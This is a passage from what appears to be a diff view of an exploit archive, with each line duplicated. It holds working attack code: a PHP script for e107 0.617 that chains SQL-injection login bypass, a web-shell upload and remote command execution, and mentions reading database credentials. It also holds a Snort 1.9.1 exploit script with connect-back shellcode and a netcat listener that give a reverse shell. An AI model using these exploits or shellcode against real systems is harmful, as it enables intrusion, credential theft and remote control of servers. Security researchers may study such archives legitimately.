i=i+optlen; i=i+optlen;
} else { } else {
/* We could not read this portion because of some error, skip it */ /* We could not read this portion because of some error, skip it */
i=i+4; i=i+4;
} }
} }
return 0; return 0;
} }
// milw0rm.com [2007-07-10] // milw0rm.com [2007-07-10]

522
platforms/linux/remote/1258.php
View file

@ -1,261 +1,261 @@
<?php <?php
# 0.27 18/10/2005 # # 0.27 18/10/2005 #
# # # #
# ---e017_xpl.php # # ---e017_xpl.php #
# # # #
# e107 0.617 resetcore.php SQL Injection & remote code execution all-in-one # # e107 0.617 resetcore.php SQL Injection & remote code execution all-in-one #
# # # #
# by rgod # # by rgod #
# site: http://rgod.altervista.org # # site: http://rgod.altervista.org #
# # # #
# make these changes in php.ini if you have troubles # # make these changes in php.ini if you have troubles #
# to launch this script: # # to launch this script: #
# allow_call_time_pass_reference = on # # allow_call_time_pass_reference = on #
# register_globals = on # # register_globals = on #
# # # #
# usage: customize for your own pleasure, launch this script from Apache, # # usage: customize for your own pleasure, launch this script from Apache, #
# fill requested fields, then go! # # fill requested fields, then go! #
# # # #
# Sun-Tzu: "There is a proper season for making attacks with fire, and # # Sun-Tzu: "There is a proper season for making attacks with fire, and #
# special days for starting a conflagration. The proper season is when # # special days for starting a conflagration. The proper season is when #
# the weather is very dry; the special days are those when the moon is # # the weather is very dry; the special days are those when the moon is #
# in the constellations of the Sieve, the Wall, the Wing or the Cross-bar; # # in the constellations of the Sieve, the Wall, the Wing or the Cross-bar; #
# for these four are all days of rising wind." # # for these four are all days of rising wind." #
error_reporting(0); error_reporting(0);
ini_set("max_execution_time",0); ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2); ini_set("default_socket_timeout", 2);
ob_implicit_flush (1); ob_implicit_flush (1);
echo'<html><head><title>e107 0.617 remote commands execution </title><meta echo'<html><head><title>e107 0.617 remote commands execution </title><meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style
type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff; type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030 {background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea !important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option {background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color: {background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important; #1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size: background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #1CBc81; } a:hover{text-decoration: underline; { text-decoration: none ; color : #1CBc81; } a:hover{text-decoration: underline;
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6"> font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
e107 0.617 resetcore.php SQL injection & remote commands execution </p> <p> e107 0.617 resetcore.php SQL injection & remote commands execution </p> <p>
<class="Stile6"> a script byrgod at <a href="http://rgod.altervista.org" <class="Stile6"> a script byrgod at <a href="http://rgod.altervista.org"
target="_blank">http://rgod.altervista.org</a></p> <table width="84%"><tr> <td target="_blank">http://rgod.altervista.org</a></p> <table width="84%"><tr> <td
width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].' width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'
?path=value&host=value&port=value&command=value&proxy=value"> <p> <input ?path=value&host=value&port=value&command=value&proxy=value"> <p> <input
type="text" name="host"><span class="Stile5"> hostname (ex: www.sitename.com) type="text" name="host"><span class="Stile5"> hostname (ex: www.sitename.com)
</span></p><p> <input type="text" name="path"><span class="Stile5">path (ex: /e1 </span></p><p> <input type="text" name="path"><span class="Stile5">path (ex: /e1
07/ or just /)</span></p><p><input type="text" name="port"><span class="Stile5"> 07/ or just /)</span></p><p><input type="text" name="port"><span class="Stile5">
specify a port other than 80 (default value) </span> </p> <p><input type="text" specify a port other than 80 (default value) </span> </p> <p><input type="text"
name="command"><span class="Stile5">a shell command, cat ./../../e107_config. name="command"><span class="Stile5">a shell command, cat ./../../e107_config.
php to see database username/password </span> </p> <p> <input type="text" php to see database username/password </span> </p> <p> <input type="text"
name="proxy"><span class="Stile5">send exploit through an HTTP proxy (ip:port) name="proxy"><span class="Stile5">send exploit through an HTTP proxy (ip:port)
</span></p><p><input type="submit" name="Submit" value="go!"> </p></form></td> </span></p><p><input type="submit" name="Submit" value="go!"> </p></form></td>
</tr></table></body></html>'; </tr></table></body></html>';
function show($headeri) function show($headeri)
{ {
$ii=0; $ii=0;
$ji=0; $ji=0;
$ki=0; $ki=0;
$ci=0; $ci=0;
echo '<table border="0"><tr>'; echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1) while ($ii <= strlen($headeri)-1)
{ {
$datai=dechex(ord($headeri[$ii])); $datai=dechex(ord($headeri[$ii]));
if ($ji==16) { if ($ji==16) {
$ji=0; $ji=0;
$ci++; $ci++;
echo "<td>&nbsp;&nbsp;</td>"; echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++) for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>"; { echo "<td>".$headeri[$li+$ki]."</td>";
} }
$ki=$ki+16; $ki=$ki+16;
echo "</tr><tr>"; echo "</tr><tr>";
} }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";} {echo "<td>".$datai."</td> ";}
$ii++; $ii++;
$ji++; $ji++;
} }
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>"; { echo "<td>&nbsp&nbsp</td>";
} }
for ($li=$ci*16; $li<=strlen($headeri); $li++) for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>"; { echo "<td>".$headeri[$li]."</td>";
} }
echo "</tr></table>"; echo "</tr></table>";
} }
function sendpacket($packet) function sendpacket($packet)
{ {
global $proxy, $host, $port, $html; global $proxy, $host, $port, $html;
if ($proxy=='') if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);} {$ock=fsockopen(gethostbyname($host),$port);}
else else
{ {
$proxy=trim($proxy); $proxy=trim($proxy);
$parts=explode(':',$proxy); $parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>'; echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]); $ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...'; if (!$ock) { echo 'No response from proxy...';
die; die;
} }
} }
fputs($ock,$packet); fputs($ock,$packet);
if ($proxy=='') if ($proxy=='')
{ {
$html=''; $html='';
while (!feof($ock)) while (!feof($ock))
{ {
$html.=fgets($ock); $html.=fgets($ock);
} }
} }
else else
{ {
$html=''; $html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{ {
$html.=fread($ock,1); $html.=fread($ock,1);
} }
} }
fclose($ock); fclose($ock);
echo nl2br(htmlentities($html)); echo nl2br(htmlentities($html));
} }
if (($path<>'') and ($host<>'') and ($command<>'')) if (($path<>'') and ($host<>'') and ($command<>''))
{ {
$port=intval($port); $port=intval($port);
if (($port=='') or ($port<=0)) {$port=80;} if (($port=='') or ($port<=0)) {$port=80;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port); echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port);
#STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings #STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings
$data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)." $data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)."
&sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu &sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu
&siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a &siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a
&sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+ &sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+
is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+% is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+%
3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E. 3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E.
&newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1 &newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1
&user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10& &user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10&
smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S& smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S&
shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage= shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage=
English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1& English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1&
log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0& log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0&
forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie& forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie&
cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80& cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80&
im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php& im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php&
upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1& upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1&
displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1& displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1&
antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name="; antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name=";
$data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e"; $data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e";
// ^ ^ // ^ ^
// | | // | |
// here we have login bypass ;) hash of [nothing] // here we have login bypass ;) hash of [nothing]
//so, you see, we activate public uploads and .php extensions for attachments //so, you see, we activate public uploads and .php extensions for attachments
$packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n"; $packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n"; $packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n";
$packet.="Accept-Language: it\r\n"; $packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n"; $packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n";
$packet.="Host: ".$host.":".$port."\r\n"; $packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n"; $packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n"; $packet.="Cache-Control: no-cache\r\n";
$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; $packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n";
$packet.=$data; $packet.=$data;
show($packet); show($packet);
sendpacket($packet); sendpacket($packet);
if (eregi("Core settings successfully updated",$html)) {echo '<br>Ok... we reset core values...Continue...';} if (eregi("Core settings successfully updated",$html)) {echo '<br>Ok... we reset core values...Continue...';}
else {echo '<br>Exploit failed...'; die;} else {echo '<br>Exploit failed...'; die;}
#STEP 2 -> Upload a shell... #STEP 2 -> Upload a shell...
$data='------------W1dUnnWzZExD8Rb1Pctwsq $data='------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_name" Content-Disposition: form-data; name="file_name"
baby baby
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_version" Content-Disposition: form-data; name="file_version"
666 666
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php" Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php"
Content-Type: multipart/form-data Content-Type: multipart/form-data
<?php error_reporting(0); ini_set("max_execution_time",0); <?php error_reporting(0); ini_set("max_execution_time",0);
echo "Hi Master\r\n"; system($HTTP_GET_VARS[cmd]); ?> echo "Hi Master\r\n"; system($HTTP_GET_VARS[cmd]); ?>
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_userfile[]"; filename="" Content-Disposition: form-data; name="file_userfile[]"; filename=""
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_description" Content-Disposition: form-data; name="file_description"
mphhh.... mphhh....
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_website" Content-Disposition: form-data; name="file_website"
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_demo" Content-Disposition: form-data; name="file_demo"
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="upload" Content-Disposition: form-data; name="upload"
Submit and Upload Submit and Upload
------------W1dUnnWzZExD8Rb1Pctwsq--'; ------------W1dUnnWzZExD8Rb1Pctwsq--';
$packet="POST ".$p."upload.php HTTP/1.1\r\n"; $packet="POST ".$p."upload.php HTTP/1.1\r\n";
$packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n"; $packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n";
$packet.="Host: ".$host.":".$port."\r\n"; $packet.="Host: ".$host.":".$port."\r\n";
$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$packet.="Accept-Language: it,en;q=0.9\r\n"; $packet.="Accept-Language: it,en;q=0.9\r\n";
$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n";
$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$packet.="Referer: http://".$host.":".$port.$path."upload.php\r\n"; $packet.="Referer: http://".$host.":".$port.$path."upload.php\r\n";
$packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n"; $packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n";
$packet.="Cookie2: \$Version=1\r\n"; $packet.="Cookie2: \$Version=1\r\n";
$packet.="Connection: Close, TE\r\n"; $packet.="Connection: Close, TE\r\n";
$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; $packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n";
$packet.=$data; $packet.=$data;
show($packet); show($packet);
sendpacket($packet); sendpacket($packet);
#STEP 3 -> Launch commands... #STEP 3 -> Launch commands...
$packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n"; $packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="User-Agent: Website eXtractor\r\n"; $packet.="User-Agent: Website eXtractor\r\n";
$packet.="Host: ".$host."\r\n"; $packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n"; $packet.="Connection: Close\r\n\r\n";
show($packet); show($packet);
sendpacket($packet); sendpacket($packet);
if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';} if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';}
else {echo 'Exploit failed...';} else {echo 'Exploit failed...';}
} }
else else
{echo 'Fill in requested fields, optionally specify a proxy...';} {echo 'Fill in requested fields, optionally specify a proxy...';}
?> ?>
# milw0rm.com [2005-10-18] # milw0rm.com [2005-10-18]

6
platforms/linux/remote/139.c
View file

@ -556,6 +556,6 @@ int GetNextAddr(int Addr)
} }
return(Addr); return(Addr);
} }
// milw0rm.com [2003-12-27] // milw0rm.com [2003-12-27]

286
platforms/linux/remote/18.sh
View file

@ -1,143 +1,143 @@
#!/bin/sh #!/bin/sh
########################################################## ##########################################################
# p7snort191.sh by truff (truff@projet7.org) # # p7snort191.sh by truff (truff@projet7.org) #
# Snort 1.9.1 and below remote exploit # # Snort 1.9.1 and below remote exploit #
# # # #
# Tested on Slackware 8.0 with Snort 1.9.1 from sources # # Tested on Slackware 8.0 with Snort 1.9.1 from sources #
# # # #
# Usage: # # Usage: #
# 1/ Launch a listening netcat to listen for the shell # # 1/ Launch a listening netcat to listen for the shell #
# nc -p 45295 -l # # nc -p 45295 -l #
# # # #
# 2/ p7snort119.sh yourIP [Ret_Addr] # # 2/ p7snort119.sh yourIP [Ret_Addr] #
# # # #
# Where yourIP is the IP where the netcat is listening # # Where yourIP is the IP where the netcat is listening #
# and Ret_Addr is the address (8 hexa digits) of the # # and Ret_Addr is the address (8 hexa digits) of the #
# shellcode (eg: 0819fec2) # # shellcode (eg: 0819fec2) #
# # # #
# # # #
# This vulnerability was discovered by Bruce Leidl, # # This vulnerability was discovered by Bruce Leidl, #
# Juan Pablo Martinez Kuhn, and Alejandro David Weil # # Juan Pablo Martinez Kuhn, and Alejandro David Weil #
# from Core Security Technologies during Bugweek 2003. # # from Core Security Technologies during Bugweek 2003. #
# # # #
# Greetz to #root people and projet7 members. # # Greetz to #root people and projet7 members. #
# Special thx to mycroft for helping me with shell # # Special thx to mycroft for helping me with shell #
# scripting stuff. # # scripting stuff. #
# # # #
# www.projet7.org - Security Researchs - # # www.projet7.org - Security Researchs - #
########################################################## ##########################################################
# Put here the path to your hping2 binary # Put here the path to your hping2 binary
HPING2=/usr/sbin/hping2 HPING2=/usr/sbin/hping2
# You should change these params to make the snort sensor # You should change these params to make the snort sensor
# capture the packets. # capture the packets.
IPSRC=192.168.22.1 IPSRC=192.168.22.1
IPDST=192.168.22.2 IPDST=192.168.22.2
PTSRC=3339 PTSRC=3339
PTDST=111 PTDST=111
echo "p7snort191.sh by truff (truff@projet7.org)" echo "p7snort191.sh by truff (truff@projet7.org)"
case $# in case $# in
0) 0)
echo "Bad number of params" echo "Bad number of params"
echo "Read comments in sources" echo "Read comments in sources"
exit -1 exit -1
;; ;;
1) 1)
RET=0819fec2 RET=0819fec2
echo "Using default retaddr (Slackware 8.0)" echo "Using default retaddr (Slackware 8.0)"
echo $RET echo $RET
;; ;;
2) 2)
RET=$2 RET=$2
echo "Using custom retaddr" echo "Using custom retaddr"
echo $RET echo $RET
;; ;;
*) *)
echo "Bad number of params" echo "Bad number of params"
echo "Read comments in sources" echo "Read comments in sources"
exit -1 exit -1
;; ;;
esac esac
# Nops # Nops
i=0 i=0
while [ "$i" -lt "512" ]; do while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1) i=$(expr "$i" + 1)
echo -n -e "\x90" >> egg echo -n -e "\x90" >> egg
done done
# linux x86 shellcode by eSDee of Netric (www.netric.org) # linux x86 shellcode by eSDee of Netric (www.netric.org)
# 131 byte - connect back shellcode (port=0xb0ef) # 131 byte - connect back shellcode (port=0xb0ef)
echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg
echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg
echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg
echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg
echo -n -e "\x68" >> egg echo -n -e "\x68" >> egg
# IP here # IP here
echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \ echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \
$(echo $1 | cut -d. -f2) \ $(echo $1 | cut -d. -f2) \
$(echo $1 | cut -d. -f3) \ $(echo $1 | cut -d. -f3) \
$(echo $1 | cut -d. -f4)) >> egg $(echo $1 | cut -d. -f4)) >> egg
echo -n -e "\x66\x68\xb0" >> egg echo -n -e "\x66\x68\xb0" >> egg
echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg
echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg
echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg
echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg
echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg
echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg
echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg
echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg
echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg
echo -n -e "\x01\xcd\x80" >> egg echo -n -e "\x01\xcd\x80" >> egg
# 3 dummy bytes for alignment purposes # 3 dummy bytes for alignment purposes
echo -n -e "\x41\x41\x41" >> egg echo -n -e "\x41\x41\x41" >> egg
i=0 i=0
cpt=$(expr 3840 - 134 - 512) cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4) cpt=$(expr $cpt / 4)
var1=0x$(echo $RET | cut -b7,8) var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6) var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4) var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2) var4=0x$(echo $RET | cut -b1,2)
while [ "$i" -lt "$cpt" ]; do while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1) i=$(expr "$i" + 1)
echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg
done done
# hping ruleZ # hping ruleZ
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \ $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \ -d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null 1>/dev/null 2>/dev/null
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \ $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \ -d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null 1>/dev/null 2>/dev/null
$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \ $HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \
-d 0 --setseq 0xc0c4c014 --setack 0xffffffff \ -d 0 --setseq 0xc0c4c014 --setack 0xffffffff \
1>/dev/null 2>/dev/null 1>/dev/null 2>/dev/null
rm egg rm egg
echo "Exploit Sended" echo "Exploit Sended"
# milw0rm.com [2003-04-23] # milw0rm.com [2003-04-23]

6
platforms/linux/remote/253.pl
View file

